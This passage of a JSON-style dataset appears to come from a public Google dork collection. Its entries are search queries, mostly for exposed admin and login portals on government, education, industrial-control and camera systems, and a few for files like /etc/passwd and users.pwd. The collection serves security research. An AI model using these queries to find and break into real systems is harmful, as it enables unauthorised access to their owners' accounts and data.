"description": "# Google Dork: intitle:\"admin login\" site:.in\r\n# Pages Containing Login Portals\r\n# Date: 15/09/2021 \r\n# Exploit Author: Priya Dalal"}, {"dork": "\" Stanford CoreNLP \" \"Visualisation provided using the brat visualisation\"", "description": "# Google Dork: \" Stanford CoreNLP \" \"Visualisation provided using the brat visualisation\"\r\n# Various Online Devices\r\n# Date: 15/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "Google Dork: inurl:\"admin/login\" site:\".gov.in\"", "description": "# Google Dork: inurl:\"admin/login\" site:\".gov.in\"\r\n# Pages Containing Login Portals\r\n# Date: 16/09/2021\r\n# Exploit Author: Bhavin Amesara"}, {"dork": "site:*/admin.php inurl:admin", "description": "# Google Dork: site:*/admin.php inurl:admin\r\n# Pages Containing Login Portals\r\n# Date:17/09/2021\r\n# Exploit Author: Sonu Chaudhary"}, {"dork": "intext:Provided by ProjectSend", "description": "# Google Dork: intitle:\"Polycom Login\" inurl:\"/login.html\"\r\n# Pages Containing Login Portals\r\n#Date: 30/08/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle|inurl:\"SCADA login\"", "description": "# Google Dork: intitle|inurl:\"SCADA login\"\r\n# Pages Containing Login Portals\r\n# Date:16/09/2021\r\n# Exploit Author: Cyber Shelby"}, {"dork": "allinurl:logon.html CSCOE", "description": "# Google Dork: allinurl:logon.html CSCOE\r\n# Pages Containing Login Portals\r\n# Date:19/09/2021\r\n# Exploit Author: Yazan Z\u00a0Al-Mallah"}, {"dork": "companies' service login Login Portal", "description": "# Google Dork: companies' service login Login Portal\r\n# Pages Containing Login Portals\r\n# Date: 17/09/2021 \r\n# Exploit Author: Sonu Chaudhary"}, {"dork": "intitle:\"Intelbras\" \"All Rights Reserved\" -.com", "description": "# Google Dork: intitle:\"Intelbras\" \"All Rights Reserved\" -.com\r\n# Pages Containing Login Portals\r\n# Date: 15/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle|inurl::\"IoT login\"", "description": "# Google Dork: intitle|inurl::\"IoT login\"\r\n# Pages Containing Login Portals\r\n# Date:23/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "inurl: login.http", "description": "# Google Dork: inurl: login.http\r\n# Pages Containing Login Portals\r\n# Date:23/09/2021\r\n# Exploit Author: Poulami Kayal"}, {"dork": "inurl:/admin/AdminLogin.jsp intitle:\"CERGY - Administration\"", "description": "# Google Dork: inurl:/admin/AdminLogin.jsp intitle:\"CERGY - Administration\"\r\n# Pages Containing Login Portals \r\n# Date: 22/07/2021 \r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"Codian MCU - login\" \"Copyright TANDBERG\"", "description": "# Google Dork: intitle:\"Codian MCU - login\" \"Copyright TANDBERG\"\r\n# Pages Containing Login Portals\r\n# Date: 18/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"admin login\" site:.gov.in", "description": "# Google Dork: intitle:\"admin login\" site:.gov.in\r\n# Pages Containing Login Portals\r\n# Date: 21/09/2021 \r\n# Exploit Author: Deven Rathod"}, {"dork": "intitle:administration intext:\"portail\" \"Login\"", "description": "# Google Dork: intitle:administration intext:\"portail\" \"Login\"\r\n# Pages Containing Login Portals\r\n# Date: 24/09/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "inurl:login.rsp \"User name\"", "description": "# Google Dork: inurl:login.rsp \"User name\"\r\n# Pages Containing Login Portals\r\n# Date: 24/09/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "inurl:saml2/login", "description": "# Google Dork: inurl:saml2/login\r\n# Pages Containing Login Portals\r\n# Date:27/09/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "inurl:\"profile/login\"", "description": "# Google Dork: inurl:\"profile/login\"\r\n# Pages Containing Login Portals\r\n# Date: 28/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"Welcome\" intext:\"Login\"", "description": "# Google Dork: intitle:\"Welcome\" intext:\"Login\"\r\n# Pages Containing Login Portals\r\n# Date: 28/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intext:\"Infinitium Copyrights Reserved\"", "description": "# Google Dork: intext:\"Infinitium Copyrights Reserved\"\r\n# Pages Containing Login Portals\r\n# Date:30/08/2021\r\n# Exploit Author: Mohammad Zulfiqar WARDI"}, {"dork": "site:*/etc/passwd inurl\"/etc/passwd\"", "description": "# Google Dork: site:*/etc/passwd inurl\"/etc/passwd\"\r\n# Pages Containing Login Portals\r\n# Date: 20/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"webcam\" \"login\"", "description": "# Google Dork: intitle:\"webcam\" \"login\"\r\n# Pages Containing Login Portals\r\n# Date:30/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "site:*/oauth/authorize", "description": "# Google Dork: site:*/oauth/authorize\r\n# Pages Containing Login Portals\r\n# Date: 04/10/2021 \r\n# Exploit Author: Reza Abasi"}, {"dork": "inurl:.html.php:intext:\"admin\"|intext:\"user\"|intext:\"login\":site:\".in\"", "description": "# Google Dork: inurl:.html.php:intext:\"admin\"|intext:\"user\"|intext:\"login\":site:\".in\"\r\n# Pages Containing Login Portals\r\n# Dtae: 25/09/2021\r\n# Author: Adarsh S"}, {"dork": "intitle:\"Dericam\" \"Remember Me\"", "description": "#Google Dork: intitle:\"Dericam\" \"Remember Me\" \r\n# Pages Containing Login Portals\r\n# Date: 30/08/2021 \r\n# Exploit Author: Neha Singh"}, {"dork": "inurl: /admin/login.php intitle: panel admin", "description": "# Google Dork: inurl: /admin/login.php intitle: panel admin\r\n# Pages Containing Login Portals\r\n# Date:01/10/2021\r\n# Exploit Author: Bhavin Amesara"}, {"dork": "inurl:admin/reset.php -github", "description": "# Google Dork: inurl:admin/reset.php -github\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: Vaibhav Kumar Srivastava"}, {"dork": "intext:Provided by ProjectSend", "description": "# Google Dork: intext:Provided by ProjectSend\r\n# Pages Containing Login Portals\r\n# Date: 30/08/2021\r\n# Exploit Author: Abdullah Kala"}, {"dork": "inurl: \"admin-login.php\"", "description": "# Google Dork: inurl: \"admin-login.php\"\r\n# Pages Containing Login Portals\r\n# Date:04/10/2021\r\n# Exploit Author: Zeshan Ahmad"}, {"dork": "Dork - inurl: \"site admin\"", "description": "# Google Dork: Dork - inurl: \"site admin\"\r\n# Pages Containing Login Portals\r\n# Date:04/10/2021\r\n# Exploit Author: Zeshan Ahmad"}, {"dork": "Fwd: intitle:\"Login\" \"FLX Web Server\"", "description": "# Google Dork: Fwd: intitle:\"Login\" \"FLX Web Server\"\r\n# Pages Containing Login Portals\r\n# Date:07/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "inurl:/webmail/src/login.php intext:\"SquirrelMail\"", "description": "# Google Dork: inurl:/webmail/src/login.php intext:\"SquirrelMail\"\r\n# Pages Containing Login Portals\r\n# Date:11/10/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "Fwd: intitle:\"Zimbra Web Client Sign In\" \"Synacor\"", "description": "# Google Dork: Fwd: intitle:\"Zimbra Web Client Sign In\" \"Synacor\"\r\n# Pages Containing Login Portals\r\n# Date:08/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Fwd: intitle:\"Project Insight - Login\" \"Sign In to Continue\" \"Shift4 Payments\"", "description": "# Google Dork: Fwd: intitle:\"Project Insight - Login\" \"Sign In to Continue\" \"Shift4 Payments\"\r\n# Pages Containing Login Portals\r\n# Date:09/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "inurl:sap/public/ intext:Logon \"Password\"", "description": "# Google Dork: inurl:sap/public/ intext:Logon \"Password\"\r\n# Pages Containing Login Portals\r\n# Date:09/10/2021\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intext:\"Open Game Panel 2021\"", "description": "# Google Dork: intext:\"Open Game Panel 2021\"\r\n# Pages Containing Login Portals\r\n# Date:10/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "site:\"*.com\" inurl: admin/index.php", "description": "# Google Dork: site:\"*.com\" inurl: admin/index.php\r\n# Pages Containing Login Portals\r\n# Date:09/10/2021\r\n# Exploit Author: adreeta maity"}, {"dork": "intitle:\"Portal\" & (inurl:\"login.asp\" | inurl:\"login.aspx\")", "description": "# Google Dork: intitle:\"Portal\" & (inurl:\"login.asp\" | inurl:\"login.aspx\")\r\n# Pages Containing Login Portals\r\n# Date:13/10/2021\r\n# Exploit Author: Muhammad Ali Akbar"}, {"dork": "intitle:\"Portal\" inurl:\"login.php\"", "description": "# Google Dork: intitle:\"Portal\" inurl:\"login.php\"\r\n# Pages Containing Login Portals\r\n# Date:13/10/2021\r\n# Exploit Author: Muhammad Ali Akbar"}, {"dork": "\"com.sap.itsam.problems.java.systeminfo\"", "description": "# Google Dork: \"com.sap.itsam.problems.java.systeminfo\"\r\n# Pages Containing Login Portals\r\n# Date:13/10/2021\r\n# Exploit Author: GnosticPlayers"}, {"dork": "intitle:cisco \"This is a restricted Access Server\"", "description": "# Google Dork: intitle:cisco \"This is a restricted Access Server\"\r\n# Pages Containing Login Portals\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:vmware \"This is a restricted Access Server\"", "description": "# Google Dork: intitle:vmware \"This is a restricted Access Server\"\r\n# Pages Containing Login Portals\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "inurl:mail intitle:Webmail - Login", "description": "# Google Dork: inurl:mail intitle:Webmail - Login\r\n# Pages Containing Login Portals\r\n# Date: 15/10/2021 \r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo\r\n# Mail Service Enumeration"}, {"dork": "inurl:/admin/login.php intitle: \"panel\"", "description": "# Google Dork: inurl:/admin/login.php intitle: \"panel\"\r\n# Pages Containing Login Portals\r\n# Date: 14/10/2021\r\n# Exploit Author: Roshdy Essam"}, {"dork": "Fwd: intitle:\"MedDream\" \"Softneta\" -.com", "description": "# Google Dork: Fwd: intitle:\"MedDream\" \"Softneta\" -.com\r\n# Pages Containing Login Portals\r\n# Date:15/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Fwd: inurl:\"/sslvpn_logon.shtml\" intitle:\"User Authentication\" \"WatchGuard Technologies\"", "description": "# Google Dork: Fwd: inurl:\"/sslvpn_logon.shtml\" intitle:\"User Authentication\" \"WatchGuard Technologies\"\r\n# Pages Containing Login Portals\r\n# Date:16/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "intitle:\"Portal\" inurl:\"login.jsp\"", "description": "# Google Dork: intitle:\"Portal\" inurl:\"login.jsp\"\r\n# Pages Containing Login Portals\r\n# Date:18/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"SonicWall Analyzer Login\"", "description": "# Google Dork: intitle:\"SonicWall Analyzer Login\"\r\n# Pages Containing Login Portals\r\n# Date:18/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "intitle:\"Issabel login - page\"", "description": "# Google Dork: intitle:\"Issabel login - page\"\r\n# Pages Containing Login Portals\r\n# Date:19/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:\"Juniper Networks Web\" \"Log In\"", "description": "# Google Dork: intitle:\"Juniper Networks Web\" \"Log In\"\r\n# Pages Containing Login Portals\r\n# Date:19/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "Fwd: intitle:\"Support Portal\" intext:\"Bomgar Corporation. Redistribution Prohibited. All Rights Reserved.\" \"Representatives\"", "description": "# Google Dork: intitle:\"Support Portal\" intext:\"Bomgar Corporation. Redistribution Prohibited. All Rights Reserved.\" \"Representatives\"\r\n# Pages Containing Login Portals\r\n# Date: 19/10/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/?page=login\"", "description": "# Google Dork: inurl:\"/?page=login\"\r\n# Pages Containing Login Portals\r\n# Date: 19/10/2021 \r\n# Exploit Author: Reza Abasi"}, {"dork": "inurl:\"/?a=login\" intext:\"login\"", "description": "# Google Dork: inurl:\"/?a=login\" intext:\"login\"\r\n# Pages Containing Login Portals\r\n# Date: 19/10/2021 \r\n# Exploit Author: Reza Abasi"}, {"dork": "Fwd: intitle:\"Cloudphysician RADAR\"", "description": "# Google Dork: intitle:\"Cloudphysician RADAR\"\r\n# Pages Containing Login Portals (EMR Systems)\r\n# Date: 20/10/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "filetype:conf intext:\"Footer Powered By\"", "description": "# Google Dork: filetype:conf intext:\"Footer Powered By\"\r\n# Pages Containing Login Portals\r\n# Date: 20/10/2021\r\n# Exploit Author: Sandesh Ajgekar"}, {"dork": "\"fluig\" \"login\"", "description": "# Google Dork: \"fluig\" \"login\"\r\n# Pages Containing Login Portals\r\n# Date: 20/10/2021\r\n# Exploit Author: Dennis Silva"}, {"dork": "intitle:\"CMS\" inurl:\"login.php\"", "description": "# Google Dork: intitle:\"CMS\" inurl:\"login.php\"\r\n# Pages Containing Login Portals\r\n# Date:21/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "site:*/membership-login/", "description": "# Google Dork: site:*/membership-login/\r\n# Pages Containing Login Portals\r\n# Date:21/10/2021\r\n# Exploit Author: reza abasi"}, {"dork": "intitle:\"TYPO3 CMS Login\"", "description": "# Google Dork: intitle:\"TYPO3 CMS Login\"\r\n# Pages Containing Login Portals\r\n# Date:21/10/2021\r\n# Exploit Author: Simone Crema"}, {"dork": "intitle:\"Sign in [Jenkins]\" inurl:\"login?from\"", "description": "# Google Dork: intitle:\"Sign in [Jenkins]\" inurl:\"login?from\"\r\n# Pages Containing Login Portals\r\n# Date:21/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "inurl:/designs/imm/index.php", "description": "# Google Dork: inurl:/designs/imm/index.php\r\n# Pages Containing Login Portals\r\n# Date:22/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:\"Sophos\" inurl:/userportal/webpages/myaccount/login.jsp", "description": "# Google Dork: intitle:\"Sophos\" inurl:/userportal/webpages/myaccount/login.jsp\r\n# Pages Containing Login Portals\r\n# Date:22/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "inurl:fgtauth?", "description": "# Google Dork: inurl:fgtauth?\r\n# Pages Containing Login Portals\r\n# Date:22/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "inurl:/phpldapadmin/cmd.php", "description": "# Google Dork: inurl:/phpldapadmin/cmd.php\r\n# Pages Containing Login Portals\r\n# Date:22/10/2021\r\n# Exploit Author: Na\u00efm Gallouj"}, {"dork": "allintitle:\"MeshCentral - Login\"", "description": "# Google Dork: allintitle:\"MeshCentral - Login\"\r\n# Pages Containing Login Portals\r\n# Date:25/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:\"CMS\" inurl:\"login.jsp\"", "description": "# Google Dork: intitle:\"CMS\" inurl:\"login.jsp\"\r\n# Pages Containing Login Portals\r\n# Date:25/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"HRMS\" inurl:\"login.aspx\"", "description": "# Google Dork: intitle:\"HRMS\" inurl:\"login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date:25/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "inurl:\"index.php\" intitle:\"CMS Login\"", "description": "# Google Dork: inurl:\"index.php\" intitle:\"CMS Login\"\r\n# Pages Containing Login Portals\r\n# Date:26/10/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"Student\" inurl:\"login.aspx\"", "description": "# Google Dork: intitle:\"Student\" inurl:\"login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date:25/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"Employee Login\" & inurl:(\"login.aspx\" | \"login.asp\")", "description": "# Google Dork: intitle:\"Employee Login\" & inurl:(\"login.aspx\" | \"login.asp\")\r\n# Pages Containing Login Portals\r\n# Date:26/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"Journal\" inurl:\"login.aspx\"", "description": "# Google Dork: intitle:\"Journal\" inurl:\"login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date:26/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intext:Project hosted at: For support, contact: Copyright Openbravo", "description": "# Google Dork: intext:Project hosted at: For support, contact: Copyright Openbravo\r\n# Pages Containing Login Portals\r\n# Date:26/10/2021\r\n# Exploit Author: Na\u00efm Gallouj"}, {"dork": "site:.bd http intitle: admin", "description": "# Google Dork: site:.bd http intitle: admin\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: MD. Rimel"}, {"dork": "intitle:\"Admin Login\" inurl:\"login.aspx\"", "description": "# Google Dork: intitle:\"Admin Login\" inurl:\"login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date:26/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "inurl:login/users.pwd", "description": "# Google Dork: inurl:login/users.pwd\r\n# Pages Containing Login Portals\r\n# Date:27/10/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "inurl:\"wp-login.php?action=login\"", "description": "# Google Dork: inurl:\"wp-login.php?action=login\"\r\n# Pages Containing Login Portals\r\n# Date:27/10/2021\r\n# Exploit Author: Reza Abasi"}, {"dork": "intitle:\"LoRaWAN Login\"", "description": "# Google Dork: intitle:\"LoRaWAN Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intext: \"mailenable\" inurl:\"/lang/sys/login.aspx\"", "description": "# Google Dork: intext: \"mailenable\" inurl:\"/lang/sys/login.aspx\"\r\n# Files Containing Juicy Info\r\n# Date:27/10/2021\r\n# Exploit Author: Nisrin Ahmed"}, {"dork": "intitle:Hikvision login page", "description": "# Google Dork: intitle:Hikvision login page\r\n# Pages Containing Login Portals\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intitle:ip camera login page", "description": "# Google Dork: intitle:ip camera login page\r\n# Pages Containing Login Portals\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intitle:TYPO3 CMS Login: New TYPO3 site inurl:/typo3/index.php", "description": "# Google Dork: intitle:TYPO3 CMS Login: New TYPO3 site inurl:/typo3/index.php\r\n# Pages Containing Login Portals\r\n# Date:28/10/2021\r\n# Exploit Author: Na\u00efm Gallouj"}, {"dork": "inurl:\"brandmeister page=login\"", "description": "# Google Dork: inurl:\"brandmeister page=login\"\r\n# Pages Containing Login Portals\r\n# Date:29/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intext:\"admin\" AND \"login\" | \"sign in\" AND \"\u00a9\" AND \"rights reserved\"", "description": "# Google Dork: intext:\"admin\" AND \"login\" | \"sign in\" AND \"\u00a9\" AND \"rights reserved\"\r\n# Pages Containing Login Portals\r\n# Date:29/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"I-Portal\" inurl:\"login.jsp\"", "description": "# Google Dork: intitle:\"I-Portal\" inurl:\"login.jsp\"\r\n# Pages Containing Login Portals\r\n# Date: 30/10/2021 \r\n# Exploit Author: Jawhar Milkan"}, {"dork": "intitle:\"RM Portal\"", "description": "# Google Dork: intitle:\"RM Portal\"\r\n# Pages Containing Login Portals\r\n# Date: 30/10/2021\r\n# Exploit Author: Dennis Silva"}, {"dork": "intitle:\"TOTVS SmartClient HTML - Par\u00e2metros Iniciais\"", "description": "# Google Dork: intitle:\"TOTVS SmartClient HTML - Par\u00e2metros Iniciais\"\r\n# Pages Containing Login Portals\r\n# Date: 30/10/2021\r\n# Exploit Author: Dennis Silva"}, {"dork": "intitle:\"Gophish - Login\"", "description": "# Google Dork: intitle:\"Gophish - Login\"\r\n# Pages Containing Login Portals\r\n# Date:31/10/2021\r\n# Exploit Author: Piyush Patil"}, {"dork": "intitle:\"Kerio Connect Client\" inurl:\"/webmail/login/\"", "description": "# Google Dork: intitle:\"Kerio Connect Client\" inurl:\"/webmail/login/\"\r\n# Pages Containing Login Portals\r\n# Date:2/11/2021\r\n# Exploit Author: Nisrin Ahmed"}, {"dork": "inurl:/carbon/admin/login.jsp", "description": "# Google Dork: site:*.example.com inurl:/carbon/admin/login.jsp\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/11/2021\r\n# Author: Girish"}, {"dork": "intext:\"Powered by \" inurl:/login", "description": "# Google Dork intext:\"Powered by \" inurl:/login\r\n# Pages Containing Login Portals\r\n# Date: 03/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:newsdesk.cgi?", "description": "# Google Dork: inurl:newsdesk.cgi?\r\n# Pages Containing Login Portals\r\n# Date: 05/11/2021 \r\n# Exploit Author: Shubh Mishra"}, {"dork": "intext:\"untitled\" intext:\"login\" filetype:php", "description": "# Google Dork: intext:\"untitled\" intext:\"login\" filetype:php\r\n# Pages Containing Login Portals\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"untitled\" intext:\"password\" filetype:php", "description": "# Google Dork: intext:\"untitled\" intext:\"password\" filetype:php\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"webmail Login\"", "description": "# Google Dork: intitle:\"webmail Login\"\r\n# Pages Containing Login Portals\r\n# Date:5/11/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "site:in inurl:/admin/login", "description": "# Google Dork: site:in inurl:/admin/login\r\n# Pages Containing Login Portals\r\n# Date: 07/11/2021 \r\n# Exploit Author: Arzan Batliwala"}, {"dork": "inurl:gov.in", "description": "# Google Dork: inurl:gov.in\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intitle:MailEnable inurl:\"/Login.aspx\"", "description": "# Google Dork: intitle:MailEnable inurl:\"/Login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date: 7/11/2021 \r\n# Exploit Author: Chinmay Divekar"}, {"dork": "inurl:8888 ext:php inurl:login", "description": "# Google Dork: inurl:8888 ext:php inurl:login\r\n# Pages Containing Login Portals\r\n# Date: 05/11/2021 \r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "inurl:4444 ext:php inurl:login", "description": "# Google Dork: inurl:4444 ext:php inurl:login\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "inurl:login.net", "description": "# Google Dork:inurl:login.net\r\n# Pages Containing Login Portals\r\n# Date: 0811/2021 \r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "site:com inurl:/admin/login", "description": "# Google Dork: site:com inurl:/admin/login\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "site:.edu.in inurl:login.aspx", "description": "# Google Dork: site:.edu.in inurl:login.aspx\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Mohamed Rahman Shareff S"}, {"dork": "site:.edu.in inurl:login.aspx", "description": "# Google Dork: site:.edu.in inurl:login.aspx\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Mohamed Rahman Shareff S"}, {"dork": "intext:\"untitled\" intext:\"admin\" filetype:php", "description": "# Google Dork: intext:\"untitled\" intext:\"admin\" filetype:php\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "site:gov.in inurl:/admin/login", "description": "# Google Dork: site:gov.in inurl:/admin/login\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Suvendu Dash"}, {"dork": "inurl:80 ext:php inurl:login", "description": "# Google Dork: inurl:80 ext:php inurl:login\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "index of:\"customer/login\"", "description": "# Google Dork: index of:\"customer/login\"\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "index of:\"seller/login\"", "description": "# Google Dork: index of:\"seller/login\"\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "site:*.in inurl: admin login", "description": "# Google Dork: site:*.in inurl: admin login\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Ritika Keni"}, {"dork": "inurl:gov.in & (intitle:login | intitle:signin)", "description": "# Google Dork: inurl:gov.in & (intitle:login | intitle:signin)\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Sabyasachi Paul"}, {"dork": "inurl:gov.in & inurl:wp-admin", "description": "# Google Dork: inurl:gov.in & inurl:wp-admin\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Sabyasachi Paul"}, {"dork": "site:*.gov.in inurl:login.jsp", "description": "# Google Dork: site:*.gov.in inurl:login.jsp\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Nithissh S"}, {"dork": "site:.edu.in inurl:login.php", "description": "# Google Dork: site:.edu.in inurl:login.php\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:.edu inurl:login \"Admin\"", "description": "# Google Dork: site:.edu inurl:login \"Admin\"\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "inurl:gov.uk & inurl:wp-admin", "description": "# Google Dork: inurl:gov.uk & inurl:wp-admin\r\n# Pages Containing Login Portals\r\n# Date:9/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:smtp3.*.*/login", "description": "# Google Dork: site:smtp3.*.*/login\r\n# Pages Containing Login Portals\r\n# Date: 09/11/2021 \r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "inurl:login.php site:.in", "description": "# Google Dork: inurl:login.php site:.in\r\n# Pages Containing Login Portals\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Login\" intext:\"camera\"", "description": "# Google Dork: intitle:\"Login\" intext:\"camera\"\r\n# Pages Containing Login Portals\r\n# Date:12/11/2021\r\n# Exploit Author: Naveen Venugopal"}, {"dork": "inurl:console/login.jsp", "description": "# Google Dork: inurl:console/login.jsp\r\n# Pages Containing Login Portals\r\n# Date: 12/11/2021 \r\n# Exploit Author: Md Anzaruddin"}, {"dork": "inurl:EMSWebClient/", "description": "# Google Dork: inurl:EMSWebClient/\r\n# Pages Containing Login Portals\r\n# Date: 12/11/2021 \r\n# Exploit Author: Soriful Islam Shoaib"}, {"dork": "inurl admin login php gov.in", "description": "# Google Dork: inurl admin login php gov.in\r\n# Pages Containing Login Portals\r\n# Date: 14/11/2021 \r\n# Exploit Author: Arindam Saha"}, {"dork": "site:*.in inurl:jira login", "description": "# Google Dork: site:*.in inurl:jira login\r\n# Pages Containing Login Portals\r\n# Date:13/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:*.gov.au inurl:wp-admin", "description": "# Google Dork: site:*.gov.au inurl:wp-admin\r\n# Pages Containing Login Portals\r\n# Date: 13/11/2021 \r\n# Exploit Author: Haox Hapot"}, {"dork": "Fwd: intitle:\"Schneider Electric Telecontrol - Industrial Web Control\" intext:\"Xflow \"", "description": "# Google Dork: Fwd: intitle:\"Schneider Electric Telecontrol - Industrial Web Control\" intext:\"Xflow \"\r\n# Pages Containing Login Portals\r\n# Date:14/11/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "inurl *:8443/login.jsp", "description": "# Google Dork: inurl *:8443/login.jsp\r\n# Pages Containing Login Portals\r\n# Date:15/11/2021\r\n# Exploit Author: Vivek Pancholi"}, {"dork": "intitle:\"Login\" intext:\"cam\"", "description": "# Google Dork: intitle:\"Login\" intext:\"cam\"\r\n# Pages Containing Login Portals\r\n# Date:16/11/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "inurl:\"*admin | login\" | inurl:.php | .asp", "description": "# Google Dork: inurl:\"*admin | login\" | inurl:.php | .asp\r\n# Pages Containing Login Portals\r\n# Date: 17/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Teltonika -Web UI\" | intitle:\"Teltonika-RUT -Web UI\" inurl:\"/cgi-bin/luci\"", "description": "# Google Dork: intitle:\"Teltonika -Web UI\" | intitle:\"Teltonika-RUT -Web UI\" inurl:\"/cgi-bin/luci\"\r\n# Pages Containing Login Portals\r\n# Date: 16/11/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:/admin/login.php intitle:(\"Iniciar sesion\" OR \"Login\")", "description": "# Google Dork: inurl:/admin/login.php intitle:(\"Iniciar sesion\" OR \"Login\")\r\n# Pages Containing Login Portals\r\n# Date: 17/11/2021 \r\n# Exploit Author: Diego Bardalez Plaza"}, {"dork": "inurl:/intranet/login.php", "description": "# Google Dork: inurl:/intranet/login.php\r\n# Pages Containing Login Portals\r\n# Date: 18/11/2021 \r\n# Exploit Author: Diego Bardalez Plaza"}, {"dork": "intitle:\"Login to SDT-CS3B1\"", "description": "# Google Dork: intitle:\"Login to 